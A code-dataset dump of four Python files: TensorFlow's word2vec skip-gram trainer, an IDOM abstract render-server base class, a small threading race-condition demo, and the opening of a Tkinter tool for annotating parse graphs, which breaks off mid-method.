source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
word2vec.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec mini-batched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.
The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
"E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "File consisting of analogies of four tokens."
"embedding 2 - embedding 1 + embedding 3 should be close "
"to embedding 4."
"E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval).")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def forward(self, examples, labels):
"""Build the graph for the forward pass."""
opts = self._options
# Declare all variables we need.
# Embedding: [vocab_size, emb_dim]
init_width = 0.5 / opts.emb_dim
emb = tf.Variable(
tf.random_uniform(
[opts.vocab_size, opts.emb_dim], -init_width, init_width),
name="emb")
self._emb = emb
# Softmax weight: [vocab_size, emb_dim]. Transposed.
sm_w_t = tf.Variable(
tf.zeros([opts.vocab_size, opts.emb_dim]),
name="sm_w_t")
# Softmax bias: [emb_dim].
sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")
# Global step: scalar, i.e., shape [].
self.global_step = tf.Variable(0, name="global_step")
# Nodes to compute the nce loss w/ candidate sampling.
labels_matrix = tf.reshape(
tf.cast(labels,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.num_samples,
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist()))
# Embeddings for examples: [batch_size, emb_dim]
example_emb = tf.nn.embedding_lookup(emb, examples)
# Weights for labels: [batch_size, emb_dim]
true_w = tf.nn.embedding_lookup(sm_w_t, labels)
# Biases for labels: [batch_size, 1]
true_b = tf.nn.embedding_lookup(sm_b, labels)
# Weights for sampled ids: [num_sampled, emb_dim]
sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
# Biases for sampled ids: [num_sampled, 1]
sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)
# True logits: [batch_size, 1]
true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b
# Sampled logits: [batch_size, num_sampled]
# We replicate sampled noise lables for all examples in the batch
# using the matmul.
sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
sampled_logits = tf.matmul(example_emb,
sampled_w,
transpose_b=True) + sampled_b_vec
return true_logits, sampled_logits
def nce_loss(self, true_logits, sampled_logits):
"""Build the graph for the NCE loss."""
# cross-entropy(logits, labels)
opts = self._options
true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
true_logits, tf.ones_like(true_logits))
sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
sampled_logits, tf.zeros_like(sampled_logits))
# NCE-loss is the sum of the true and noise (sampled words)
# contributions, averaged over the batch.
nce_loss_tensor = (tf.reduce_sum(true_xent) +
tf.reduce_sum(sampled_xent)) / opts.batch_size
return nce_loss_tensor
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def build_eval_graph(self):
"""Build the eval graph."""
# Eval graph
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._emb, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, self._options.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
true_logits, sampled_logits = self.forward(examples, labels)
loss = self.nce_loss(true_logits, sampled_logits)
tf.scalar_summary("NCE loss", loss)
self._loss = loss
self.optimize(loss)
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(opts.save_path, self._session.graph)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
while True:
time.sleep(opts.statistics_interval) # Reports our progress once a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
(epoch, step, lr, loss, rate), end="")
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
for t in workers:
t.join()
return epoch
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
base.py
|
import abc
from threading import Event, Thread
from typing import Any, Dict, Generic, Optional, Tuple, TypeVar
from idom.core.component import ComponentConstructor
_App = TypeVar("_App", bound=Any)
_Config = TypeVar("_Config", bound=Any)
_Self = TypeVar("_Self", bound="AbstractRenderServer[Any, Any]")
class AbstractRenderServer(Generic[_App, _Config], abc.ABC):
"""Base class for all IDOM server application and extension implementations.
It is assumed that IDOM will be used in conjuction with some async-enabled server
library (e.g. ``sanic`` or ``tornado``) so these server implementations should work
standalone and as an extension to an existing application.
Standalone usage:
:meth:`AbstractServerExtension.run` or :meth:`AbstractServerExtension.daemon`
Register an extension:
:meth:`AbstractServerExtension.register`
"""
def __init__(
self,
constructor: ComponentConstructor,
config: Optional[_Config] = None,
) -> None:
self._app: Optional[_App] = None
self._root_component_constructor = constructor
self._daemon_thread: Optional[Thread] = None
self._config = self._create_config(config)
self._server_did_start = Event()
@property
def application(self) -> _App:
if self._app is None:
raise RuntimeError("No application registered.")
return self._app
def run(self, host: str, port: int, *args: Any, **kwargs: Any) -> None:
"""Run as a standalone application."""
if self._app is None:
app = self._default_application(self._config)
self.register(app)
else: # pragma: no cover
app = self._app
if self._daemon_thread is None: # pragma: no cover
return self._run_application(self._config, app, host, port, args, kwargs)
else:
return self._run_application_in_thread(
self._config, app, host, port, args, kwargs
)
def daemon(self, *args: Any, **kwargs: Any) -> Thread:
"""Run the standalone application in a seperate thread."""
self._daemon_thread = thread = Thread(
target=lambda: self.run(*args, **kwargs), daemon=True
)
thread.start()
self.wait_until_server_start()
return thread
def register(self: _Self, app: Optional[_App]) -> _Self:
"""Register this as an extension."""
self._setup_application(self._config, app)
self._setup_application_did_start_event(
self._config, app, self._server_did_start
)
self._app = app
return self
def wait_until_server_start(self, timeout: float = 3.0) -> None:
"""Block until the underlying application has started"""
if not self._server_did_start.wait(timeout=timeout):
raise RuntimeError( # pragma: no cover
f"Server did not start within {timeout} seconds"
)
@abc.abstractmethod
def stop(self) -> None:
"""Stop a currently running application"""
@abc.abstractmethod
def _create_config(self, config: Optional[_Config]) -> _Config:
"""Return the default configuration options."""
@abc.abstractmethod
def _default_application(self, config: _Config) -> _App:
"""If used standalone this should return an application."""
raise NotImplementedError()
@abc.abstractmethod
def _setup_application(self, config: _Config, app: _App) -> None:
"""General application setup - add routes, templates, static resource, etc."""
raise NotImplementedError()
@abc.abstractmethod
def _setup_application_did_start_event(
self, config: _Config, app: _App, event: Event
) -> None:
"""Register a callback to the app indicating whether the server has started"""
raise NotImplementedError()
@abc.abstractmethod
def _run_application(
self,
config: _Config,
app: _App,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
"""Run the application in the main thread"""
raise NotImplementedError()
@abc.abstractmethod
def _run_application_in_thread(
self,
config: _Config,
app: _App,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
"""This function has been called inside a daemon thread to run the application"""
raise NotImplementedError()
|
example1.py
|
import threading
import random
import time
def update():
global counter
current_counter = counter # reading in shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
counter = current_counter + 1 # updating shared resource
counter = 0
threads = [threading.Thread(target=update) for i in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print(f'Final counter: {counter}.')
print('Finished.')
|
annotator.py
|
# TODO: Add this as an entry point in setup.py, so it can be run directly.
"""Tkinter-based app for annotating samples."""
import bz2
import dbm
import json
import threading
import time
import traceback
from io import BytesIO
from tkinter import Tk, Canvas, Text, END, Scrollbar, VERTICAL, HORIZONTAL, Frame, Label, Button, \
Checkbutton, IntVar, TclError
from tkinter.ttk import Separator, Combobox
from typing import Union, Tuple, Optional, Dict, List, Sequence
import PIL.Image
from PIL.ImageTk import PhotoImage
from pyramids.model import Model
try:
from graphviz import Digraph
except ImportError:
Digraph = None
from pyramids.categorization import Category, Property
from pyramids.graphs import ParseGraph, BuildGraph
from pyramids.parsing import Parser
MM_PER_INCH = 25.4
# Flow:
# * Select an existing or new annotation set:
# * New:
# * Choose save path
# * Choose parser model
# * Existing:
# * Choose load path
# * Create/resume annotation task: (annotation tasks are attached to specific annotation sets)
# * New:
# * Choose name
# * Choose utterance list
# * Resume:
# * Choose name
# * Switch to the annotation window and proceed to annotate samples
# * Annotations are auto-saved as they are modified
# Menu layout:
# * File:
# * New annotation set
# * Open annotation set
# * New utterance list
# * Edit utterance list
# * Export annotations (save to alternative formats, e.g. tab-delimited)
# * Edit:
# * Undo (bound to Ctrl-Z)
# * Redo (bound to Shift-Ctrl-Z)
# * View: (only in annotation window)
# * Stats (parser accuracy, annotation completion, etc. on the annotation set, broken out by
# utterance list)
# * Toggle show/hide parse visualization
# * Task:
# * New annotation task (annotation set to add to, and utterance list to add from)
# * Resume annotation task
# * Delete annotation task
# * Settings: (only in annotation window)
# * Parser timeout
# * Restriction category
# * Utterance ordering (original, random, shortest/longest first, alphabetical, parser
# uncertainty-sorted)
# * Utterance filtering
# * Parser:
# * Train (entire annotation set or particular utterance list)
# * Evaluate (entire annotation set or particular utterance list)
# Utterance list window layout:
# * Menu
# * Header:
# * Current utterance list
# * Utterance list stats
# * Add utterance area:
# * Utterance text box (sorts utterance listing to put nearest matches at top as utterance
# is typed)
# * Add button (bound to <Return>)
# * Clear button (bound to <Escape>)
# * Body:
# * Utterance listing:
# * Utterance
# * Edit button
# * Remove button
# * Footer:
# * Page navigation (first, prev, next, last)
# Annotation window layout:
# * Menu
# * Header:
# * Current annotation set
# * Current utterance list
# * Current utterance
# * Current utterance with injected links & parens
# * Left panel:
# * Category name (drop-down)
# * Property selection (checkboxes)
# * Token listing:
# * Token spelling
# * Token index
# * Outbound link listing:
# * Link label (drop-down)
# * Link sink token (drop-down)
# * Delete button
# * New link button
# * Right panel:
# * Tree visualization (optional, depending on whether graphviz is installed & view is
# enabled)
# * Footer:
# * Reset (clears manual annotations and re-queries the model)
# * Accept/reject
# * Utterance list navigation (first, prev, next, last, new)
class ReadoutFrame(Frame):
def __init__(self, parent, labels, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.labels = []
self.boxes = []
self.mapping = {}
self.columnconfigure(1, weight=1)
for row, label_text in enumerate(labels):
assert label_text not in self.mapping
label = Label(self, text=label_text + ':')
label.grid(row=row, column=0, sticky='ne')
self.labels.append(label)
box = Text(self, state='disabled', height=1)
box.grid(row=row, column=1, sticky='new')
self.boxes.append(box)
self.mapping[label_text] = row
def set(self, label, value):
box = self.boxes[self.mapping[label]]
if value is None:
text = ''
else:
text = str(value)
box['state'] = 'normal'
box.delete(1.0, END)
box.insert(END, text)
box['state'] = 'disabled'
box['width'] = len(text)
def get(self, label):
box = self.boxes[self.mapping[label]]
return box.get(1.0, END).rstrip('\n')
def clear(self, label=None):
if label is None:
for box in self.boxes:
box.delete(1.0, END)
else:
box = self.boxes[self.mapping[label]]
box.delete(1.0, END)
class TokenEditingFrame(Frame):
def __init__(self, parent, model: Model, graph: BuildGraph, *args, graph_change_callback=None,
**kwargs):
super().__init__(parent, *args, **kwargs)
self.model = model
self.graph = graph
self.link_types = sorted(str(label) for label in self.model.link_types)
self.graph_change_callback = graph_change_callback
self.token_listing = ['%s [%s]' % (token.spelling, index)
for index, token in enumerate(graph.tokens)]
assert len(self.token_listing) == len(graph.tokens)
self.token_labels = [Label(self, text='%s [%s]' % (token.spelling, index))
for index, token in enumerate(graph.tokens)]
assert len(self.token_labels) == len(graph.tokens)
self.separators = [Separator(self, orient=HORIZONTAL) for _ in graph.tokens]
assert len(self.separators) == len(graph.tokens)
link_sets = []
for source in range(len(graph.tokens)):
link_set = set()
for sink in graph.get_sinks(source):
for label in graph.get_labels(source, sink):
link_set.add((str(label), sink))
link_sets.append(link_set)
assert len(link_sets) == len(graph.tokens)
self.link_selector_maps = [] # type: List[Dict[Tuple[Optional[Property], int], Tuple]]
for source, link_set in enumerate(link_sets):
link_selector_map = {}
for label, sink in link_set:
label_drop_down = Combobox(self, values=self.link_types)
label_drop_down.current(self.link_types.index(label))
label_drop_down.bind("<<ComboboxSelected>>",
(lambda *a, r=(source, label, sink), v=label_drop_down, **k:
self.modify_link(r, label=v.get())))
sink_drop_down = Combobox(self, values=self.token_listing)
sink_drop_down.current(sink)
sink_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, label, sink), v=sink_drop_down, **k:
self.modify_link(r, sink=self.token_listing.index(v.get()))))
remove_button = Button(self, text='-',
command=lambda r=(source, label, sink): self.modify_link(r))
link_selector_map[label, sink] = label_drop_down, sink_drop_down, remove_button
self.link_selector_maps.append(link_selector_map)
assert len(self.link_selector_maps) == len(graph.tokens)
self.new_link_selectors = [] # type: List[Tuple[Combobox, Combobox]]
for source in range(len(self.graph.tokens)):
label_drop_down = Combobox(self, values=[''] + self.link_types)
label_drop_down.current(0)
label_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, None, None): self.modify_link(r, new=True)))
sink_drop_down = Combobox(self, values=[''] + self.token_listing)
sink_drop_down.current(0)
sink_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, None, None): self.modify_link(r, new=True)))
self.new_link_selectors.append((label_drop_down, sink_drop_down))
def modify_link(self, link, *, source=None, label=None, sink=None, new=False):
old_source, old_label, old_sink = link
assert old_source is not None
if new:
assert old_label is None
assert old_sink is None
assert source is None
assert sink is None
assert label is None
assert 0 <= old_source < len(self.new_link_selectors)
label_drop_down, sink_drop_down = self.new_link_selectors[old_source]
label = label_drop_down.get() or None
sink_index = sink_drop_down.current()
if sink_index > 0:
sink = sink_index - 1
else:
sink = None
if label is not None and sink is not None:
label_drop_down.current(0)
sink_drop_down.current(0)
label_drop_down.selection_clear()
sink_drop_down.selection_clear()
else:
assert old_sink is not None
assert old_label is not None
self.graph.remove_link(old_source, old_label, old_sink)
items = self.link_selector_maps[old_source].pop((old_label, old_sink))
for item in items:
if hasattr(item, 'destroy'):
item.destroy()
if source is not None or label is not None or sink is not None:
if source is None:
source = old_source
if label is None:
label = old_label
if sink is None:
sink = old_sink
assert source is not None
if sink is not None and label is not None:
if label not in self.link_types:
self.link_types.append(label)
label_drop_down = Combobox(self, values=self.link_types)
label_drop_down.current(self.link_types.index(label))
label_drop_down.bind("<<ComboboxSelected>>",
(lambda *a, r=(source, label, sink), v=label_drop_down, **k:
self.modify_link(r, label=v.get())))
sink_drop_down = Combobox(self, values=self.token_listing)
sink_drop_down.current(sink)
sink_drop_down.bind('<<ComboboxSelected>>',
(lambda *a, r=(source, label, sink), v=sink_drop_down, **k:
self.modify_link(r, sink=v.current())))
remove_button = Button(self, text='-',
command=lambda r=(source, label, sink): self.modify_link(r))
self.graph.add_link(source, label, sink)
self.link_selector_maps[source][label, sink] = (label_drop_down, sink_drop_down,
remove_button)
if new or source is None:
self.refresh()
if self.graph_change_callback:
self.graph_change_callback()
def refresh(self):
current_row = 0
for token_index in range(len(self.graph.tokens)):
self.separators[token_index].grid(row=current_row, column=0, columnspan=5, sticky='wen')
current_row += 1
self.token_labels[token_index].grid(row=current_row, column=0, sticky='wn')
# self.add_buttons[token_index].grid(row=current_row, column=1, sticky='nwe')
for label, sink in sorted(self.link_selector_maps[token_index],
key=lambda l: (l[1], l[0])):
entry = self.link_selector_maps[token_index][label, sink]
label_drop_down, sink_drop_down, remove_button = entry
label_drop_down.grid(row=current_row, column=2, sticky='nwe')
sink_drop_down.grid(row=current_row, column=3, sticky='nwe')
remove_button.grid(row=current_row, column=4, sticky='nwe')
current_row += 1
label_drop_down, sink_drop_down = self.new_link_selectors[token_index]
label_drop_down.grid(row=current_row, column=2, sticky='nwe')
sink_drop_down.grid(row=current_row, column=3, sticky='nwe')
current_row += 1
if not self.link_selector_maps[token_index]:
current_row += 1
class ScrollableFrame(Frame):
def __init__(self, parent, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.canvas = Canvas(self)
self.inner_frame = Frame(self.canvas)
self.vertical_scrollbar = Scrollbar(self, orient=VERTICAL, command=self.canvas.yview)
self.horizontal_scrollbar = Scrollbar(self, orient=HORIZONTAL, command=self.canvas.xview)
self.canvas.configure(yscrollcommand=self.vertical_scrollbar.set,
xscrollcommand=self.horizontal_scrollbar.set)
self.canvas.grid(row=0, column=0, sticky='news')
self.vertical_scrollbar.grid(row=0, column=1, sticky='ns')
self.horizontal_scrollbar.grid(row=1, column=0, stick='we')
self.canvas.create_window((4, 4), window=self.inner_frame, anchor='nw')
self.inner_frame.bind("<Configure>", self._on_frame_configure)
# noinspection PyUnusedLocal
def _on_frame_configure(self, event):
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
class GraphEditingFrame(Frame):
def __init__(self, parent, model, *args, graph_change_callback=None, **kwargs):
super().__init__(parent, *args, **kwargs)
self.model = model
self._graph = BuildGraph()
self.category = model.default_restriction
self.graph_change_callback = graph_change_callback
self.rowconfigure(2, weight=1)
self.columnconfigure(0, weight=1)
self.category_frame = Frame(self)
self.category_frame.grid(row=0, column=0, sticky='wen')
self.property_frame = Frame(self)
self.property_frame.grid(row=1, column=0, sticky='wen')
self.scrollable_tef_container = ScrollableFrame(self)
self.scrollable_tef_container.grid(row=2, column=0, sticky='wens')
self.scrollable_tef_container.inner_frame.rowconfigure(0, weight=1)
self.scrollable_tef_container.inner_frame.columnconfigure(0, weight=1)
self.token_editing_frame = TokenEditingFrame(self.scrollable_tef_container.inner_frame,
model, self._graph,
graph_change_callback=graph_change_callback)
self.token_editing_frame.grid(row=0, column=0, sticky='nwes')
self.category_readout = ReadoutFrame(self.category_frame, ['Category'])
self.category_readout.grid(row=0, column=0, sticky='nw')
self.category_readout.set('Category', self.category)
props_per_row = 5
top_row = {'statement', 'question', 'command', 'complete'}
self.properties = {}
for index, prop in enumerate(sorted(model.top_level_properties,
key=lambda p: (str(p) not in top_row, str(p)))):
variable = IntVar()
checkbox = Checkbutton(self.property_frame, text=str(prop), variable=variable,
command=self.on_property_change)
checkbox.property_name = prop
checkbox.variable = variable
checkbox.grid(row=index // props_per_row, column=index % props_per_row, sticky='nw')
self.properties[prop] = variable, checkbox
@property
def graph(self) -> BuildGraph:
return self._graph
@graph.setter
def graph(self, graph: BuildGraph) -> None:
self._graph = graph
for index in range(len(graph.tokens)):
props = (self.model.top_level_properties &
graph.get_phrase_category(index).positive_properties)
category = Category(self.model.default_restriction.name, props)
self.graph.set_phrase_category(index, category)
self.category = self.model.default_restriction
for index in sorted(graph.find_roots()):
self.category = graph.get_phrase_category(index)
for prop in self.properties:
has_prop = prop in self.category.positive_properties
self.properties[prop][0].set(has_prop)
self.token_editing_frame.destroy()
self.token_editing_frame = TokenEditingFrame(
self.scrollable_tef_container.inner_frame,
self.model, graph,
graph_change_callback=self.graph_change_callback
)
self.token_editing_frame.grid(row=0, column=0, sticky='nwes')
self.on_property_change()
def on_property_change(self):
self.refresh()
if self.graph_change_callback:
self.graph_change_callback()
def refresh(self):
self.token_editing_frame.refresh()
props = [prop for prop in self.properties if self.properties[prop][0].get()]
